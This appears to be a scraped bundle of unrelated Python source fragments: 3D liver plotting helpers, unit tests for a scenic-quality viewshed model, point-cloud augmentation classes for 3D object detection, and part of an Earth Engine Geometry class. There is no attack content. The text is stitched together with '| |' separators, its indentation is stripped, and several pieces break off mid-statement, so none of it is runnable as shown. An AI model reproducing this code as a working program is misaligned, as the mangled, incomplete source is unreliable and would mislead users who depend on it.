def create_axs(subplot_n,block=False,return_fig=False):
r = int(np.floor(np.sqrt(subplot_n)))
c = int(subplot_n/r)
fig = plt.figure(figsize=plt.figaspect(0.5))
axs = {}
for i in range(subplot_n):
axs[i] = fig.add_subplot(r, c, i+1, projection='3d')
if return_fig:
return axs,fig
return axs
def draw_liver(liver,ax):
ax.cla()
ax = liver.plt_vtx(ax=ax)
ax = liver.plt_x(ax=ax)
plt_equal(ax)
return ax
def draw_liver_F(liver,axs,f_scl = 5e0):
# Fes, Ficp, Fis+ displacement
| |
from __future__ import print_function
import unittest
import logging
import os
import sys
import subprocess
import math
import numpy as np
import random
import time
import csv
import glob
import shutil
import json
from osgeo import gdal
from osgeo import ogr
from nose.plugins.skip import SkipTest
import invest_test_core
from invest_natcap import raster_utils
from invest_natcap.scenic_quality \
import scenic_quality as sq
from invest_natcap.scenic_quality \
import scenic_quality_core as sqc
import scenic_quality_cython_core
LOGGER = logging.getLogger('scenic_quality_test')
logging.basicConfig(format='%(asctime)s %(name)-15s %(levelname)-8s \
%(message)s', level=logging.DEBUG, datefmt='%m/%d/%Y %H:%M:%S ')
class TestScenicQuality(unittest.TestCase):
"""Main testing class for the scenic quality tests"""
def setUp(self):
pass
def test_extreme_cell_angles_naive(self):
"""Testing extreme_cell_angles_naive on 3x3 array.
Sanity check to make sure the naive function does what we expect.
Inputs: None
Returns nothing"""
array_shape = (3, 3)
viewpoint = (array_shape[0]/2, array_shape[1]/2)
# Shorthand constants
pi = math.pi
rad_to_deg = 180.0 / pi
deg_to_rad = 1.0 / rad_to_deg
# The angles we're expecting
a = {}
a[18] = (np.arctan2(0.5, 1.5) * rad_to_deg + 360.) % 360.
a[45] = 45.0
a[71] = (np.arctan2(1.5, 0.5) * rad_to_deg + 360.) % 360.
a[90] = 90.
a[108] = (np.arctan2(1.5, -0.5) * rad_to_deg + 360.) % 360.
a[135] = 135.0
a[161] = (np.arctan2(0.5, -1.5) * rad_to_deg + 360.) % 360.
a[180] = 180.
a[198] = (np.arctan2(-0.5, -1.5) * rad_to_deg + 360.) % 360.
a[225] = 225.0
a[251] = (np.arctan2(-1.5, -0.5) * rad_to_deg + 360.) % 360.
a[270] = 270.
a[288] = (np.arctan2(-1.5, 0.5) * rad_to_deg + 360.) % 360.
a[315] = 315.0
a[341] = (np.arctan2(-0.5, 1.5) * rad_to_deg + 360.) % 360.
# Convert to rad so it's compatible with extreme_cell_angles_naive
for key in a.keys():
a[key] *= deg_to_rad
# Use the angles above to create the expected min/max angles
# 1st line is for pixel at row 0, col 0
# Subsequent lines are:
# row 0, col 1,
# row 0, col 2,
# row 1, col 0,
# row 1, col 2, (skip center point at row 1, col 1)
# row 2, col 0,
# row 2, col 1,
# row 2, col 2,
expected_extreme_angles = [ \
(a[108], (a[135], a[161])), \
(a[45], (a[90], a[135])), \
(a[18], (a[45], a[71])), \
(a[135], (a[180], a[225])), \
(a[315], (0., a[45])), \
(a[198], (a[225], a[251])), \
(a[225], (a[270], a[315])), \
(a[288], (a[315], a[341]))]
# Compute extreme angles for each cell
computed_extreme_angles = []
for row in range(array_shape[0]):
for col in range(array_shape[1]):
if row == 1 and col == 1:
continue
cell = (row, col)
computed_extreme_angles.append( \
self.extreme_cell_angles_naive(cell, viewpoint))
# convert tuple to np.array
a, b = zip(*computed_extreme_angles)
b, c = zip(*b)
a = np.array(a)
b = np.array(b)
c = np.array(c)
computed_extreme_angles = np.array([a, b, c])
a, b = zip(*expected_extreme_angles)
b, c = zip(*b)
a = np.array(a)
b = np.array(b)
c = np.array(c)
expected_extreme_angles = np.array([a, b, c])
# Compare both results
error = np.sum(np.absolute(computed_extreme_angles - \
expected_extreme_angles))
# Assert if necessary
message = 'error is ' + str(error)
assert abs(error) < 1e-14, message
def extreme_cell_angles_naive(self, cell_coord, viewpoint_coord):
"""Test each of the 4 corners of a cell, compute their angle from
the viewpoint and return the smallest and largest angles in a tuple.
Inputs:
-cell_coord: (row, col) tuple of the cell we want to compute
the extreme angles from.
-viewpoint_coord: (row, col) tuple of the observer that is
looking at the point cell_coord.
Returns a numpy array with the extreme angles
[min_cell_angle, center_cell_angle, max_cell_angle]"""
# Convert cell and viewpoint tuples to numpy arrays
cell = np.array([cell_coord[0], cell_coord[1]])
viewpoint = np.array([viewpoint_coord[0], viewpoint_coord[1]])
# Compute the angle to the center of the cell
viewpoint_to_cell = cell - viewpoint
center_angle = np.arctan2(-viewpoint_to_cell[0], viewpoint_to_cell[1])
center_angle = (2.0 * math.pi + center_angle) % (2.0 * math.pi)
# Compute the minimum and maximum angles by goign through each corner
max_angle = 0.
min_angle = 2.0 * math.pi
# Define the 4 cell corners
corners = np.array([ \
[cell_coord[0] + .5, cell_coord[1] + .5], \
[cell_coord[0] - .5, cell_coord[1] + .5], \
[cell_coord[0] + .5, cell_coord[1] - .5], \
[cell_coord[0] - .5, cell_coord[1] - .5]])
# If cell angle is 0, use pre-computed corners for min and max:
if center_angle == 0.:
viewpoint_to_corner = corners[2] - viewpoint
min_angle = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
min_angle = (2.0 * math.pi + min_angle) % (2.0 * math.pi)
viewpoint_to_corner = corners[3] - viewpoint
max_angle = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
max_angle = (2.0 * math.pi + max_angle) % (2.0 * math.pi)
else:
# Compute angle to all 4 cell corners and update min and max angles
for corner in corners:
viewpoint_to_corner = corner - viewpoint
angle_to_corner = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
angle_to_corner = \
(2.0 * math.pi + angle_to_corner) % (2.0 * math.pi)
# Sort the angles
if angle_to_corner > max_angle:
max_angle = angle_to_corner
if angle_to_corner < min_angle:
min_angle = angle_to_corner
# Done, return min and max angles
return (min_angle, (center_angle, max_angle))
def test_maximum_distance(self):
"""Test that the maximum distance is properly computed in
Python's list_extreme_angles"""
def disk(radius):
"""Create a disk of radius 'radius' around a center pixel"""
diameter = radius * 2 + 1
A = np.zeros((diameter, diameter))
center_r = radius
center_c = center_r
for r in range(diameter):
for c in range(diameter):
if (r == center_r) and (c == center_c):
pass
d = (r-center_r)**2+(c-center_c)**2
if d <= center_r**2:
A[r, c] = 1
return A
# Test for discs of radius 1 to 5
for max_dist in range(1, 6):
array_shape = (max_dist * 2 + 1, max_dist * 2 + 1)
viewpoint = (max_dist, max_dist)
# Generate disc from nested function
D = disk(max_dist)
# Double check that what we have is within the radius
I, J = np.where(D > 0)
I = I - viewpoint[0]
J = J - viewpoint[1]
L = I**2 + J**2
assert (L <= max_dist**2).all()
I, J = np.where(D <= 0)
I = I - viewpoint[0]
J = J - viewpoint[1]
L = I**2 + J**2
assert (L > max_dist**2).all()
# Adjusting the center to conform with list_extreme_angles
D[viewpoint] = 0
# Gather extreme angles from efficient algorithm
extreme_angles = \
sqc.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
A = np.zeros(array_shape)
A[extreme_angles[3], extreme_angles[4]] = 1
# compare both
if np.sum(np.abs(A-D)) > 0:
print('expected:')
print(D)
print('computed:')
print(A)
message = "Area of extreme angles doesn't form a valid disc."
assert np.sum(np.abs(A-D)) == 0, message
def test_extreme_cell_angles(self):
"""Testing naive vs optimized version of extreme cell angles"""
max_dist = 4
array_shape = (max_dist*2+1, max_dist*2+1)
viewpoint = (array_shape[0]/2, array_shape[1]/2)
max_dist_sq = max_dist **2 # Used to skip cells that are too far
# Gather extreme angles from naive algorithm
extreme_angles_naive = []
for row in range(array_shape[0]):
for col in range(array_shape[1]):
cell = np.array([row, col])
viewpoint_to_cell = cell - viewpoint
if np.sum(viewpoint_to_cell**2) > max_dist_sq:
continue
if (row == viewpoint[0]) and (col == viewpoint[1]):
continue
cell = (row, col)
extreme_angles_naive.append( \
self.extreme_cell_angles_naive(cell, viewpoint))
# Convert to numpy
min_angles, nested_list = zip(*extreme_angles_naive)
min_angles = np.array(min_angles)
center_angles, max_angles = zip(*nested_list)
center_angles = np.array(center_angles)
max_angles = np.array(max_angles)
extreme_angles_naive = (min_angles, center_angles, max_angles)
# Gather extreme angles from efficient algorithm
extreme_angles_fast = \
sqc.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
_min = extreme_angles_fast[0]
_ctr = extreme_angles_fast[1]
_max = extreme_angles_fast[2]
I = extreme_angles_fast[3]
J = extreme_angles_fast[4]
matrix = np.zeros([np.max(I)+1, np.max(J)+1])
np.set_printoptions(precision = 4)
matrix[(I, J)] = _max
#print('max')
#print(matrix)
#matrix[(I, J)] = _ctr
#print('center')
#print(matrix)
#matrix[(I, J)] = _min
#print('min')
#print(matrix)
# Compare the two
error = np.sum(np.abs(extreme_angles_naive[0]-extreme_angles_fast[0])+\
np.abs(extreme_angles_naive[1]-extreme_angles_fast[1]) + \
np.abs(extreme_angles_naive[2]-extreme_angles_fast[2]))
# assert if necessary
if error > 5e-15:
print('naive', extreme_angles_naive)
print('fast', extreme_angles_fast)
print('difference')
print(extreme_angles_fast[0] - extreme_angles_naive[0])
print(extreme_angles_fast[1] - extreme_angles_naive[1])
print(extreme_angles_fast[2] - extreme_angles_naive[2])
message = 'error on expected and computed angles is too large:' + \
str(error)
assert error < 5e-15, message
def test_list_extreme_cell_angles_cython(self):
"""Comparing cython vs python list_extreme_cell_angles"""
array_size = 6
array_shape = (array_size, array_size)
viewpoint = (array_shape[0]/4, array_shape[1]/3)
# Test with infinite distance
max_dist = -1
# Gather extreme angles from cython algorithm
extreme_angles_cython = \
scenic_quality_cython_core.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
# Gather extreme angles from python algorithm
extreme_angles_python = \
sqc.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
# Compare the two
error = np.sum(np.abs(extreme_angles_python[0]-extreme_angles_cython[0])+\
np.abs(extreme_angles_python[1]-extreme_angles_cython[1]) + \
np.abs(extreme_angles_python[2]-extreme_angles_cython[2]))
# assert | |
import numpy as np
import copy
import os
from up.utils.general.registry_factory import AUGMENTATION_REGISTRY
from up.data.datasets.transforms import Augmentation
from up.extensions.python import iou3d_nms_utils
from up.tasks.det_3d.data.box_utils import boxes3d_kitti_fakelidar_to_lidar, enlarge_box3d, remove_points_in_boxes3d
from up.tasks.det_3d.data.box_utils import mask_boxes_outside_range_numpy
from up.tasks.det_3d.data.data_utils import rotate_points_along_z, limit_period, keep_arrays_by_name
from up.utils.general.petrel_helper import PetrelHelper
tv = None
try:
import cumm.tensorview as tv
except BaseException:
pass
@AUGMENTATION_REGISTRY.register('point_sampling')
class PointAugSampling(Augmentation):
def __init__(self, root_path, class_names, db_info_paths, db_info_filters, sample_groups,
num_point_features, remove_extra_width, limit_whole_scene=False, use_road_plane=True,
database_with_fakelidar=False, logger=None):
self.root_path = root_path
self.class_names = class_names
self.num_point_features = num_point_features
self.remove_extra_width = remove_extra_width
self.limit_whole_scene = limit_whole_scene
self.use_road_plane = use_road_plane
self.database_with_fakelidar = database_with_fakelidar
self.logger = logger
self.db_infos = self.get_db_infos(db_info_paths, db_info_filters)
self.sample_groups_dict, self.sample_class_num = self.get_sample_group(sample_groups)
def augment(self, data):
data_dict = copy.copy(data)
gt_boxes = data_dict['gt_boxes']
gt_names = data_dict['gt_names'].astype(str)
existed_boxes = gt_boxes
total_valid_sampled_dict = []
for class_name, sample_group in self.sample_groups_dict.items():
if self.limit_whole_scene:
num_gt = np.sum(class_name == gt_names)
sample_group['sample_num'] = str(int(self.sample_class_num[class_name]) - num_gt)
if int(sample_group['sample_num']) > 0:
sampled_dict = self.sample_with_fixed_number(class_name, sample_group)
sampled_boxes = np.stack([x['box3d_lidar'] for x in sampled_dict], axis=0).astype(np.float32)
if self.database_with_fakelidar:
sampled_boxes = boxes3d_kitti_fakelidar_to_lidar(sampled_boxes)
iou1 = iou3d_nms_utils.boxes_bev_iou_cpu(sampled_boxes[:, 0:7], existed_boxes[:, 0:7])
iou2 = iou3d_nms_utils.boxes_bev_iou_cpu(sampled_boxes[:, 0:7], sampled_boxes[:, 0:7])
iou2[range(sampled_boxes.shape[0]), range(sampled_boxes.shape[0])] = 0
iou1 = iou1 if iou1.shape[1] > 0 else iou2
valid_mask = ((iou1.max(axis=1) + iou2.max(axis=1)) == 0).nonzero()[0]
valid_sampled_dict = [sampled_dict[x] for x in valid_mask]
valid_sampled_boxes = sampled_boxes[valid_mask]
existed_boxes = np.concatenate((existed_boxes, valid_sampled_boxes), axis=0)
total_valid_sampled_dict.extend(valid_sampled_dict)
sampled_gt_boxes = existed_boxes[gt_boxes.shape[0]:, :]
if total_valid_sampled_dict.__len__() > 0:
data_dict = self.add_sampled_boxes_to_scene(data_dict, sampled_gt_boxes, total_valid_sampled_dict)
data_dict.pop('gt_boxes_mask')
return data_dict
def get_db_infos(self, db_info_paths, db_info_filters):
db_infos = {}
for class_name in self.class_names:
db_infos[class_name] = []
for db_info_path in db_info_paths:
infos = PetrelHelper.load_pk(db_info_path, mode='rb')
[db_infos[cur_class].extend(infos[cur_class]) for cur_class in self.class_names]
for func_name, val in db_info_filters.items():
db_infos = getattr(self, func_name)(db_infos, val)
return db_infos
def get_sample_group(self, sample_groups):
sample_groups_dict = {}
sample_class_num = {}
for x in sample_groups:
class_name, sample_num = x.split(':')
if class_name not in self.class_names:
continue
sample_class_num[class_name] = sample_num
sample_groups_dict[class_name] = {
'sample_num': sample_num,
'pointer': len(self.db_infos[class_name]),
'indices': np.arange(len(self.db_infos[class_name]))
}
return sample_groups_dict, sample_class_num
def filter_by_min_points(self, db_infos, min_gt_points_list):
for name_num in min_gt_points_list:
name, min_num = name_num.split(':')
min_num = int(min_num)
if min_num > 0 and name in db_infos.keys():
filtered_infos = []
for info in db_infos[name]:
if info['num_points_in_gt'] >= min_num:
filtered_infos.append(info)
if self.logger is not None:
self.logger.info('Database filter by min points %s: %d => %d' %
(name, len(db_infos[name]), len(filtered_infos)))
db_infos[name] = filtered_infos
return db_infos
def filter_by_difficulty(self, db_infos, removed_difficulty):
new_db_infos = {}
for key, dinfos in db_infos.items():
pre_len = len(dinfos)
new_db_infos[key] = [
info for info in dinfos
if info['difficulty'] not in removed_difficulty
]
if self.logger is not None:
self.logger.info('Database filter by difficulty %s: %d => %d' % (key, pre_len, len(new_db_infos[key])))
return new_db_infos
def sample_with_fixed_number(self, class_name, sample_group):
"""
Args:
class_name:
sample_group:
Returns:
"""
sample_num, pointer, indices = int(sample_group['sample_num']), sample_group['pointer'], sample_group['indices']
if pointer >= len(self.db_infos[class_name]):
indices = np.random.permutation(len(self.db_infos[class_name]))
pointer = 0
sampled_dict = [self.db_infos[class_name][idx] for idx in indices[pointer: pointer + sample_num]]
pointer += sample_num
sample_group['pointer'] = pointer
sample_group['indices'] = indices
return sampled_dict
@staticmethod
def put_boxes_on_road_planes(gt_boxes, road_planes, calib):
"""
Only validate in KITTIDataset
Args:
gt_boxes: (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
road_planes: [a, b, c, d]
calib:
Returns:
"""
a, b, c, d = road_planes
center_cam = calib.lidar_to_rect(gt_boxes[:, 0:3])
cur_height_cam = (-d - a * center_cam[:, 0] - c * center_cam[:, 2]) / b
center_cam[:, 1] = cur_height_cam
cur_lidar_height = calib.rect_to_lidar(center_cam)[:, 2]
mv_height = gt_boxes[:, 2] - gt_boxes[:, 5] / 2 - cur_lidar_height
gt_boxes[:, 2] -= mv_height # lidar view
return gt_boxes, mv_height
def add_sampled_boxes_to_scene(self, data_dict, sampled_gt_boxes, total_valid_sampled_dict):
gt_boxes_mask = data_dict['gt_boxes_mask']
gt_boxes = data_dict['gt_boxes'][gt_boxes_mask]
gt_names = data_dict['gt_names'][gt_boxes_mask]
points = data_dict['points']
if self.use_road_plane:
sampled_gt_boxes, mv_height = self.put_boxes_on_road_planes(
sampled_gt_boxes, data_dict['road_plane'], data_dict['calib']
)
data_dict.pop('calib')
data_dict.pop('road_plane')
obj_points_list = []
for idx, info in enumerate(total_valid_sampled_dict):
file_path = os.path.join(self.root_path, info['path'])
f = PetrelHelper._petrel_helper.load_data(file_path, ceph_read=False, fs_read=True, mode='rb')
obj_points = np.frombuffer(f, dtype=np.float32).reshape(
[-1, self.num_point_features]).copy()
obj_points[:, :3] += info['box3d_lidar'][:3]
if self.use_road_plane:
# mv height
obj_points[:, 2] -= mv_height[idx]
obj_points_list.append(obj_points)
obj_points = np.concatenate(obj_points_list, axis=0)
sampled_gt_names = np.array([x['name'] for x in total_valid_sampled_dict])
large_sampled_gt_boxes = enlarge_box3d(
sampled_gt_boxes[:, 0:7], extra_width=self.remove_extra_width
)
points = remove_points_in_boxes3d(points, large_sampled_gt_boxes)
points = np.concatenate([obj_points, points], axis=0)
gt_names = np.concatenate([gt_names, sampled_gt_names], axis=0)
gt_boxes = np.concatenate([gt_boxes, sampled_gt_boxes], axis=0)
data_dict['gt_boxes'] = gt_boxes
data_dict['gt_names'] = gt_names
data_dict['points'] = points
return data_dict
@AUGMENTATION_REGISTRY.register('point_flip')
class PointFlip(Augmentation):
def __init__(self, along_axis_list):
self.along_axis_list = along_axis_list
def augment(self, data):
data = copy.copy(data)
gt_boxes, points = data['gt_boxes'], data['points']
for cur_axis in self.along_axis_list:
assert cur_axis in ['x', 'y']
gt_boxes, points = getattr(self, 'random_flip_along_%s' % cur_axis)(
gt_boxes, points,
)
data['gt_boxes'] = gt_boxes
data['points'] = points
return data
def random_flip_along_x(self, gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, 6] = -gt_boxes[:, 6]
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 8] = -gt_boxes[:, 8]
return gt_boxes, points
def random_flip_along_y(self, gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 0] = -gt_boxes[:, 0]
gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
points[:, 0] = -points[:, 0]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_rotation')
class PointRotation(Augmentation):
def __init__(self, rot_range):
self.rot_range = rot_range
def augment(self, data):
output = copy.copy(data)
output = self.random_world_rotation(output)
return output
def random_world_rotation(self, data_dict):
if not isinstance(self.rot_range, list):
self.rot_range = [-self.rot_range, self.rot_range]
gt_boxes, points = self.global_rotation(
data_dict['gt_boxes'], data_dict['points'], rot_range=self.rot_range
)
data_dict['gt_boxes'] = gt_boxes
data_dict['points'] = points
return data_dict
def global_rotation(self, gt_boxes, points, rot_range):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C),
rot_range: [min, max]
Returns:
"""
noise_rotation = np.random.uniform(rot_range[0], rot_range[1])
points = rotate_points_along_z(points[np.newaxis, :, :], np.array([noise_rotation]))[0]
gt_boxes[:, 0:3] = rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], np.array([noise_rotation]))[0]
gt_boxes[:, 6] += noise_rotation
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7:9] = rotate_points_along_z(
np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))[np.newaxis, :, :],
np.array([noise_rotation])
)[0][:, 0:2]
return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_scaling')
class PointScaling(Augmentation):
def __init__(self, scale_range):
self.scale_range = scale_range
def augment(self, data):
output = copy.copy(data)
output = self.random_world_scaling(output)
return output
def random_world_scaling(self, data_dict):
gt_boxes, points = self.global_scaling(
data_dict['gt_boxes'], data_dict['points'], self.scale_range
)
data_dict['gt_boxes'] = gt_boxes
data_dict['points'] = points
return data_dict
def global_scaling(self, gt_boxes, points, scale_range):
"""
Args:
gt_boxes: (N, 7), [x, y, z, dx, dy, dz, heading]
points: (M, 3 + C),
scale_range: [min, max]
Returns:
"""
if scale_range[1] - scale_range[0] < 1e-3:
return gt_boxes, points
noise_scale = np.random.uniform(scale_range[0], scale_range[1])
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_to_voxel')
class PointProcessor(Augmentation):
def __init__(self, point_cloud_range, num_point_features, voxel_size, max_points_per_voxel, max_number_of_voxels,
remove_outside_boxes=True, shuffle_enabled=False):
self.point_cloud_range = point_cloud_range
self.num_point_features = num_point_features
self.voxel_size = voxel_size
self.max_number_of_voxels = max_number_of_voxels
self.max_points_per_voxel = max_points_per_voxel
self.remove_outside_boxes = remove_outside_boxes
self.shuffle_enabled = shuffle_enabled
grid_size = (np.array(self.point_cloud_range[3:6])
- np.array(self.point_cloud_range[0:3])) / np.array(self.voxel_size)
self.grid_size = np.round(grid_size).astype(np.int64)
def augment(self, data):
"""
Args:
data_dict:
points: (N, 3 + C_in)
gt_boxes: optional, (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
gt_names: optional, (N), string
...
Returns:
"""
data_dict = copy.copy(data)
self.training = data_dict['training']
self.class_names = data_dict['class_names']
points = data_dict.get('points', None)
gt_boxes = data_dict.get('gt_bboxes', None)
data_dict = self.before_to_voxel(data_dict)
points = self.points_encoding(points)
points, gt_boxes = self.mask_points_and_boxes_outside_range(points, gt_boxes)
voxels, coordinates, num_points = self.transform_points_to_voxels(points)
voxel_infos = {'grid_size': self.grid_size, 'num_point_features': self.num_point_features,
'voxel_size': self.voxel_size, 'point_cloud_range': self.point_cloud_range}
data_dict.update({'points': points, 'voxels': voxels, 'voxel_coords': coordinates,
'voxel_num_points': num_points, 'voxel_infos': voxel_infos})
return data_dict
def before_to_voxel(self, data_dict):
if self.training:
data_dict['gt_boxes'][:, 6] = limit_period(
data_dict['gt_boxes'][:, 6], offset=0.5, period=2 * np.pi
)
if 'calib' in data_dict:
data_dict.pop('calib')
if 'road_plane' in data_dict:
data_dict.pop('road_plane')
if 'gt_boxes_mask' in data_dict:
gt_boxes_mask = data_dict['gt_boxes_mask']
data_dict['gt_boxes'] = data_dict['gt_boxes'][gt_boxes_mask]
data_dict['gt_names'] = data_dict['gt_names'][gt_boxes_mask]
if 'gt_boxes2d' in data_dict:
data_dict['gt_boxes2d'] = data_dict['gt_boxes2d'][gt_boxes_mask]
data_dict.pop('gt_boxes_mask')
if data_dict.get('gt_boxes', None) is not None:
selected = keep_arrays_by_name(data_dict['gt_names'], self.class_names)
data_dict['gt_boxes'] = data_dict['gt_boxes'][selected]
data_dict['gt_names'] = data_dict['gt_names'][selected]
gt_classes = np.array([self.class_names.index(n) + 1 for n in data_dict['gt_names']], dtype=np.int32)
gt_boxes = np.concatenate((data_dict['gt_boxes'], gt_classes.reshape(-1, 1).astype(np.float32)), axis=1)
data_dict['gt_boxes'] = gt_boxes
if data_dict.get('gt_boxes2d', None) is not None:
data_dict['gt_boxes2d'] = data_dict['gt_boxes2d'][selected]
return data_dict
def mask_points_and_boxes_outside_range(self, points, gt_boxes):
if points is not None:
mask = mask_points_by_range(points, self.point_cloud_range)
points = points[mask]
if gt_boxes is not None and self.remove_outside_boxes and self.training:
mask = mask_boxes_outside_range_numpy(gt_boxes, self.point_cloud_range)
gt_boxes = gt_boxes[mask]
return points, gt_boxes
def transform_points_to_voxels(self, points):
if self.shuffle_enabled:
shuffle_idx = np.random.permutation(points.shape[0])
| |
#!/usr/bin/env python
"""An object representing EE Geometries."""
# Using lowercase function naming to match the JavaScript names.
# pylint: disable=g-bad-name
import collections
import json
import numbers
import apifunction
import computedobject
import ee_exception
import ee_types
import serializer
# A sentinel value used to detect unspecified function parameters.
_UNSPECIFIED = object()
class Geometry(computedobject.ComputedObject):
"""An Earth Engine geometry."""
_initialized = False
def __init__(self, geo_json, opt_proj=None, opt_geodesic=None,
opt_evenOdd=None):
"""Creates a geometry.
Args:
geo_json: The GeoJSON object describing the geometry or a
computed object to be reinterpred as a Geometry. Supports
CRS specifications as per the GeoJSON spec, but only allows named
(rather than "linked" CRSs). If this includes a 'geodesic' field,
and opt_geodesic is not specified, it will be used as opt_geodesic.
opt_proj: An optional projection specification, either as an
ee.Projection, as a CRS ID code or as a WKT string. If specified,
overrides any CRS found in the geo_json parameter. If unspecified and
the geo_json does not declare a CRS, defaults to "EPSG:4326"
(x=longitude, y=latitude).
opt_geodesic: Whether line segments should be interpreted as spherical
geodesics. If false, indicates that line segments should be
interpreted as planar lines in the specified CRS. If absent,
defaults to true if the CRS is geographic (including the default
EPSG:4326), or to false if the CRS is projected.
opt_evenOdd: If true, polygon interiors will be determined by the even/odd
rule, where a point is inside if it crosses an odd number of edges to
reach a point at infinity. Otherwise polygons use the left-inside
rule, where interiors are on the left side of the shell's edges when
walking the vertices in the given order. If unspecified, defaults to
True.
Raises:
EEException: if the given geometry isn't valid.
"""
self.initialize()
computed = (isinstance(geo_json, computedobject.ComputedObject) and
not (isinstance(geo_json, Geometry) and
geo_json._type is not None)) # pylint: disable=protected-access
options = opt_proj or opt_geodesic or opt_evenOdd
if computed:
if options:
raise ee_exception.EEException(
'Setting the CRS or geodesic on a computed Geometry is not '
'suported. Use Geometry.transform().')
else:
super(Geometry, self).__init__(
geo_json.func, geo_json.args, geo_json.varName)
return
# Below here we're working with a GeoJSON literal.
if isinstance(geo_json, Geometry):
geo_json = geo_json.encode()
if not Geometry._isValidGeometry(geo_json):
raise ee_exception.EEException('Invalid GeoJSON geometry.')
super(Geometry, self).__init__(None, None)
# The type of the geometry.
self._type = geo_json['type']
# The coordinates of the geometry, up to 4 nested levels with numbers at
# the last level. None iff type is GeometryCollection.
self._coordinates = geo_json.get('coordinates')
# The subgeometries, None unless type is GeometryCollection.
self._geometries = geo_json.get('geometries')
# The projection code (WKT or identifier) of the geometry.
if opt_proj:
self._proj = opt_proj
elif 'crs' in geo_json:
if (isinstance(geo_json.get('crs'), dict) and
geo_json['crs'].get('type') == 'name' and
isinstance(geo_json['crs'].get('properties'), dict) and
isinstance(geo_json['crs']['properties'].get('name'), basestring)):
self._proj = geo_json['crs']['properties']['name']
else:
raise ee_exception.EEException('Invalid CRS declaration in GeoJSON: ' +
json.dumps(geo_json['crs']))
else:
self._proj = None
# Whether the geometry has spherical geodesic edges.
self._geodesic = opt_geodesic
if opt_geodesic is None and 'geodesic' in geo_json:
self._geodesic = bool(geo_json['geodesic'])
# Whether polygon interiors use the even/odd rule.
self._evenOdd = opt_evenOdd
if opt_evenOdd is None and 'evenOdd' in geo_json:
self._evenOdd = bool(geo_json['evenOdd'])
@classmethod
def initialize(cls):
"""Imports API functions to this class."""
if not cls._initialized:
apifunction.ApiFunction.importApi(cls, 'Geometry', 'Geometry')
cls._initialized = True
@classmethod
def reset(cls):
"""Removes imported API functions from this class."""
apifunction.ApiFunction.clearApi(cls)
cls._initialized = False
def __getitem__(self, key):
"""Allows access to GeoJSON properties for backward-compatibility."""
return self.toGeoJSON()[key]
@staticmethod
def Point(coords=_UNSPECIFIED, proj=_UNSPECIFIED, *args, **kwargs):
"""Constructs an ee.Geometry describing a point.
Args:
coords: A list of two [x,y] coordinates in the given projection.
proj: The projection of this geometry, or EPSG:4326 if unspecified.
*args: For convenience, varargs may be used when all arguments are
numbers. This allows creating EPSG:4326 points, e.g.
ee.Geometry.Point(lng, lat).
**kwargs: Keyword args that accept "lon" and "lat" for backward-
compatibility.
Returns:
An ee.Geometry describing a point.
"""
init = Geometry._parseArgs('Point', 1, Geometry._GetSpecifiedArgs(
(coords, proj) + args, ('lon', 'lat'), **kwargs))
if not isinstance(init, computedobject.ComputedObject):
xy = init['coordinates']
if not isinstance(xy, (list, tuple)) or len(xy) != 2:
raise ee_exception.EEException(
'The Geometry.Point constructor requires 2 coordinates.')
return Geometry(init)
@staticmethod
def MultiPoint(coords=_UNSPECIFIED, proj=_UNSPECIFIED, *args):
"""Constructs an ee.Geometry describing a MultiPoint.
Args:
coords: A list of points, each in the GeoJSON 'coordinates' format of a
Point, or a list of the x,y coordinates in the given projection, or
an ee.Geometry describing a point.
proj: The projection of this geometry. If unspecified, the default is
the projection of the input ee.Geometry, or EPSG:4326 if there are
no ee.Geometry inputs.
*args: For convenience, varargs may be used when all arguments are
numbers. This allows creating EPSG:4326 MultiPoints given an even
number of arguments, e.g.
ee.Geometry.MultiPoint(aLng, aLat, bLng, bLat, ...).
Returns:
An ee.Geometry describing a MultiPoint.
"""
all_args = Geometry._GetSpecifiedArgs((coords, proj) + args)
return Geometry(Geometry._parseArgs('MultiPoint', 2, all_args))
@staticmethod
def Rectangle(coords=_UNSPECIFIED, proj=_UNSPECIFIED,
geodesic=_UNSPECIFIED, maxError=_UNSPECIFIED,
evenOdd=_UNSPECIFIED, *args, **kwargs):
"""Constructs an ee.Geometry describing a rectangular polygon.
Args:
coords: The minimum and maximum corners of the rectangle, as a list of
two points each in the format of GeoJSON 'Point' coordinates, or a
list of two ee.Geometry describing a point, or a list of four
numbers in the order xMin, yMin, xMax, yMax.
proj: The projection of this geometry. If unspecified, the default is the
projection of the input ee.Geometry, or EPSG:4326 if there are no
ee.Geometry inputs.
geodesic: If false, edges are straight in the projection. If true, edges
are curved to follow the shortest path on the surface of the Earth.
The default is the geodesic state of the inputs, or true if the
inputs are numbers.
maxError: Max error when input geometry must be reprojected to an
explicitly requested result projection or geodesic state.
evenOdd: If true, polygon interiors will be determined by the even/odd
rule, where a point is inside if it crosses an odd number of edges to
